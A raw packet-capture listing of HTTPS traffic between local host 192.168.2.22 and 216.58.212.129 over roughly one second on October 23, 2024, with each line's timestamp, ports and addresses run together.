                                                                                                                                                                        Oct 23, 2024 17:27:01.435115099 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.435115099 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.435132027 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.435153008 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.435153008 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.446429014 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.446438074 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.446460009 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.446466923 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.446537018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.446537018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.446552992 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.446691990 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.447634935 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.447643995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.447664022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.447673082 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.447691917 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.447700977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.447726965 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.488864899 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.488876104 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.488902092 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.488909960 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.488945007 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.488960981 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.488972902 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.488972902 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.543329954 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.543343067 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.543368101 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.543375015 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.543468952 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.543493032 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.543555975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.552037954 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552048922 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552079916 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552088022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552094936 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552104950 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552138090 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.552170038 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.552198887 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.552198887 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.562983990 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.562994003 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563014030 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563021898 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563029051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563054085 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563102961 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.563126087 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.563239098 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.564275980 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.564285994 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.564311981 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.564321041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.564377069 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.564378023 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.564387083 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605413914 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605443001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605453014 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605469942 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605511904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.605511904 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.605521917 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.605593920 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606128931 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606420040 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606429100 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606451988 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606460094 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606506109 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606507063 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.606513977 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.606579065 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.660851955 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660912991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660942078 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.660953999 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.661052942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.661052942 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.661071062 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.661086082 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.679948092 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.679959059 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.679991007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680006027 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680016041 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680030107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680212975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680237055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680824995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680834055 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680857897 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680865049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680888891 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680907011 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.680927992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.680938959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.681943893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.681966066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.681988001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.682037115 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.682037115 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.682049036 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.682383060 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723078012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.723104954 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.723285913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723285913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.723304987 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777254105 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777299881 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.777559996 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.777559996 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.777580023 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779822111 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779830933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779850960 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779870033 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779963017 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.779989958 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797566891 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797638893 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797652960 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797748089 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.797806025 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797815084 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.797961950 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.797961950 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.798295021 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798304081 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798353910 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.798371077 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798387051 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.798423052 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799381971 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799388885 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799424887 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799438953 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799452066 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.799465895 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.799484015 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.840826035 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.840886116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841058969 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.841083050 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894658089 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894722939 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.894937992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.894937992 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.894961119 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896291018 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896377087 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.896385908 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896399021 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896444082 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.896450043 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.896492958 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.914580107 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914588928 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914691925 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914716959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.914736032 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.914877892 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.915148020 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.915204048 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.915205002 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.915216923 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.915263891 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.916322947 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.916347980 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.916383028 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.916393995 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.916409016 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.957360983 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.957401037 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.957664967 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.957664967 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.957684040 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958214045 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958277941 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958292007 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958302975 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.958342075 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:01.958348989 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958358049 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:01.958390951 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.012238979 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.012267113 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.012309074 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.012336969 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.012348890 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.012367010 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.020670891 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.020711899 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.020823002 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.020823002 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.020838022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032176971 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032207012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032249928 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.032269001 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032279968 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.032298088 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.032886028 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032913923 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032953024 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.032963991 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.032974958 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.073920012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.073947906 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074068069 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.074110985 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074126959 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.074722052 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074729919 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074754953 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074778080 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074789047 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.074826002 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.074836016 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.074851990 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.128827095 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.128855944 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.128902912 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.128957987 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.128979921 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.128990889 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.129609108 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.129616976 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.129651070 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.129658937 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.129687071 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.129695892 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.129705906 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.148827076 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.148889065 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.148896933 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.148952961 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149015903 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149015903 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149017096 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149032116 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149065018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149507999 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149544954 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149557114 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149564981 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149597883 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.149602890 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149610043 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.149647951 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.150247097 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.150274038 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.150305033 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.150310993 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.150321960 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.150362968 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.192169905 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.192199945 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.192383051 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.192400932 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.192451000 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.193310022 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.193336964 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.193377018 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.193384886 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.193403006 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.397469044 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.441931963 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.441942930 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442003012 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442023039 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442080975 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442089081 CEST44349172216.58.212.129192.168.2.22
                                                                                                                                                                        Oct 23, 2024 17:27:02.442210913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.442210913 CEST49172443192.168.2.22216.58.212.129
                                                                                                                                                                        Oct 23, 2024 17:27:02.442210913 CEST49172443192.168.2.22216.58.212.129
